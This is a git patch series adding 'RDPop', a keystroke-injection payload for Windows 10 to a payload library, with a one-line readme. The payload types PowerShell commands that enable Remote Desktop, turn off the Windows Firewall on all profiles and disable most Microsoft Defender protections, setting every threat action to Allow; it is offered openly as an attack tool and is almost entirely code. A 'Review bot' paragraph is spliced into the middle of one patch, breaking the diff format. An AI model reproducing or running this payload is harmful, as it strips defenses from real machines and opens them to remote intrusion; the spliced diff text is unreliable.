From 698bbb42dd4ea9e74e63f858d3e1c172a70fc670 Mon Sep 17 00:00:00 2001
From: C08W38101
Date: Fri, 14 Jun 2024 13:03:24 -0500
Subject: [PATCH 1/7] Create placeholder
---
 payloads/library/general/rdpop/placeholder | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 payloads/library/general/rdpop/placeholder
diff --git a/payloads/library/general/rdpop/placeholder b/payloads/library/general/rdpop/placeholder
new file mode 100644
index 0000000..8b13789
--- /dev/null
+++ b/payloads/library/general/rdpop/placeholder
@@ -0,0 +1 @@
+
From 7ec6bf5c0fb7f2f8ce0e11d763adb4d5c97add9f Mon Sep 17 00:00:00 2001
From: C08W38101
Date: Fri, 14 Jun 2024 13:04:16 -0500
Subject: [PATCH 2/7] Add files via upload
---
 payloads/library/general/rdpop/payload.txt | 32 ++++++++++++++++++++++
 payloads/library/general/rdpop/readme.md | 1 +
 2 files changed, 33 insertions(+)
 create mode 100644 payloads/library/general/rdpop/payload.txt
 create mode 100644 payloads/library/general/rdpop/readme.md
diff --git a/payloads/library/general/rdpop/payload.txt b/payloads/library/general/rdpop/payload.txt
new file mode 100644
index 0000000..83e2076
--- /dev/null
+++ b/payloads/library/general/rdpop/payload.txt
@@ -0,0 +1,32 @@
+GUI STRING r
+STRING powershell
+ENTER
+STRING Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
+ENTER
+STRING Set-NetFirewallProfile -Enabled False
+ENTER
+STRING Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue
+ENTER
+STRING Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue
+ENTER
+STRING Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue
+ENTER
+STRING Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue
+ENTER
+STRING Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue
+ENTER
+STRING Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue
+ENTER
+STRING Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue
+ENTER
+STRING Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue
+ENTER
+STRING Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue
+ENTER
+STRING Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue
+ENTER
+STRING Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue
+ENTER
+STRING Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue
+ENTER
+STRING Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue
\ No newline at end of file
diff --git a/payloads/library/general/rdpop/readme.md b/payloads/library/general/rdpop/readme.md
new file mode 100644
index 0000000..22d1d5f
--- /dev/null
+++ b/payloads/library/general/rdpop/readme.md
@@ -0,0 +1 @@
+a payload I made without owning any gear, it enables rdp, disables firewall, and disables defender
\ No newline at end of file
From d045b0abdf8b010e564ba5c28895f563ff5241d3 Mon Sep 17 00:00:00 2001
From: C08W38101
Date: Fri, 14 Jun 2024 13:36:25 -0500
Subject: [PATCH 3/7] Update payload.txt
---
 payloads/library/general/rdpop/payload.txt | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/payloads/library/general/rdpop/payload.txt b/payloads/library/general/rdpop/payload.txt
index 83e2076..2c879d1 100644
--- a/payloads/library/general/rdpop/payload.txt
+++ b/payloads/library/general/rdpop/payload.txt
@@ -1,3 +1,7 @@
+REM title RDPop
+REM description removes restrictions and enables rdp, if given admin privileges
+REM author C08W38101
+REM target windows 10
 GUI STRING r
 STRING powershell
 ENTER
@@ -29,4 +33,5 @@ STRING Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyConti
 ENTER
 STRING Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue
 ENTER
-STRING Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue
\ No newline at end of file
+STRING Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue
+CTRL STRING W
From 65f89f2f1d4081005f59af1ba3b498ccf624be17 Mon Sep 17 00:00:00 2001
From: C08W38101
Date: Fri, 14 Jun 2024 17:37:43 -0500
Subject: [PATCH 4/7] Update payload.txt
---
 payloads/library/general/rdpop/payload.txt | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/payloads/library/general/rdpop/payload.txt b/payloads/library/general/rdpop/payload.txt
index 2c879d1..75713a7 100644
--- a/payloads/library/general/rdpop/payload.txt
+++ b/payloads/library/general/rdpop/payload.txt
@@ -2,7 +2,7 @@ REM title RDPop
 REM description removes restrictions and enables rdp, if given admin privileges
 REM author C08W38101
 REM target windows 10
-GUI STRING r
+GUI r
 STRING powershell
 ENTER
 STRING Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
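Review bot: The REM description added at the top of the first hunk, `removes restrictions and enables rdp, if given admin privileges`, understates what the payload does, and it is the line a reader or a library index will rely on. The firewall line `Set-NetFirewallProfile -Enabled False` carries no `-Profile` argument, so it turns off the Domain, Private and Public profiles together, and the Set-MpPreference lines disable real-time monitoring and set every threat default action to Allow; I would state that scope outright, e.g. `REM description Enables RDP, disables the Windows Firewall on all profiles, and disables Defender real-time protection and threat actions; needs an elevated PowerShell session`. It is also worth recording in the header that the Set-MpPreference changes are refused while Tamper Protection is enabled and that Defender setting changes and firewall profile changes are written to the host's event logs, since the readme indicates the payload was written without being run on hardware.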
@@ -34,4 +34,4 @@ ENTER
 STRING Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue
 ENTER
 STRING Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue
-CTRL STRING W
+CTRL W
From c78feeffcbc891c43495b93141d4560d4d4344d4 Mon Sep 17 00:00:00 2001
From: C08W38101
Date: Fri, 14 Jun 2024 17:55:45 -0500
Subject: [PATCH 5/7] Update payload.txt
---
 payloads/library/general/rdpop/payload.txt | 1 +
 1 file changed, 1 insertion(+)
diff --git a/payloads/library/general/rdpop/payload.txt b/payloads/library/general/rdpop/payload.txt
index 75713a7..648312d 100644
--- a/payloads/library/general/rdpop/payload.txt
+++ b/payloads/library/general/rdpop/payload.txt
@@ -2,6 +2,7 @@ REM title RDPop
 REM description removes restrictions and enables rdp, if given admin privileges
 REM author C08W38101
 REM target windows 10
+DEFAULT_DELAY 500
 GUI r
 STRING powershell
 ENTER
From 9f8badfd39b83e81005e7b4ff259e8c3123fa2e5 Mon Sep 17 00:00:00 2001
From: C08W38101
Date: Fri, 14 Jun 2024 18:03:04 -0500
Subject: [PATCH 6/7] Update payload.txt
---
 payloads/library/general/rdpop/payload.txt | 44 ++++++++--------------
 1 file changed, 15 insertions(+), 29 deletions(-)
diff --git a/payloads/library/general/rdpop/payload.txt b/payloads/library/general/rdpop/payload.txt
index 648312d..3aa0aea 100644
--- a/payloads/library/general/rdpop/payload.txt
+++ b/payloads/library/general/rdpop/payload.txt
@@ -6,33 +6,19 @@ DEFAULT_DELAY 500
 GUI r
 STRING powershell
 ENTER
-STRING Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
-ENTER
-STRING Set-NetFirewallProfile -Enabled False
-ENTER
-STRING Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue
-ENTER
-STRING Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue
-ENTER
-STRING Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue
-ENTER
-STRING Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue
-ENTER
-STRING Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue
-ENTER
-STRING Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue
-ENTER
-STRING Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue
-ENTER
-STRING Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue
-ENTER
-STRING Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue
-ENTER
-STRING Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue
-ENTER
-STRING Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue
-ENTER
-STRING Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue
-ENTER
-STRING Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue
+STRINGLN Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
+STRINGLN Set-NetFirewallProfile -Enabled False
+STRINGLN Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue
+STRINGLN Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue
+STRINGLN Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue
+STRINGLN Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue
+STRINGLN Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue
+STRINGLN Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue
+STRINGLN Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue
+STRINGLN Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue
+STRINGLN Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue
+STRINGLN Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue
+STRINGLN Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue
+STRINGLN Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue
+STRINGLN Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue
 CTRL W
From 41e8a7ee2216c8598e81071a23424d47d158f75c Mon Sep 17 00:00:00 2001
From: C08W38101
Date: Sat, 15 Jun 2024 12:38:23 -0500
Subject: [PATCH 7/7] Update readme.md
---
 payloads/library/general/rdpop/readme.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/payloads/library/general/rdpop/readme.md b/payloads/library/general/rdpop/readme.md
index 22d1d5f..a87b060 100644
--- a/payloads/library/general/rdpop/readme.md
+++ b/payloads/library/general/rdpop/readme.md
@@ -1 +1 @@
-a payload I made without owning any gear, it enables rdp, disables firewall, and disables defender
\ No newline at end of file
+a payload I made without owning any gear, it enables rdp, disables firewall, and disables defender cobweb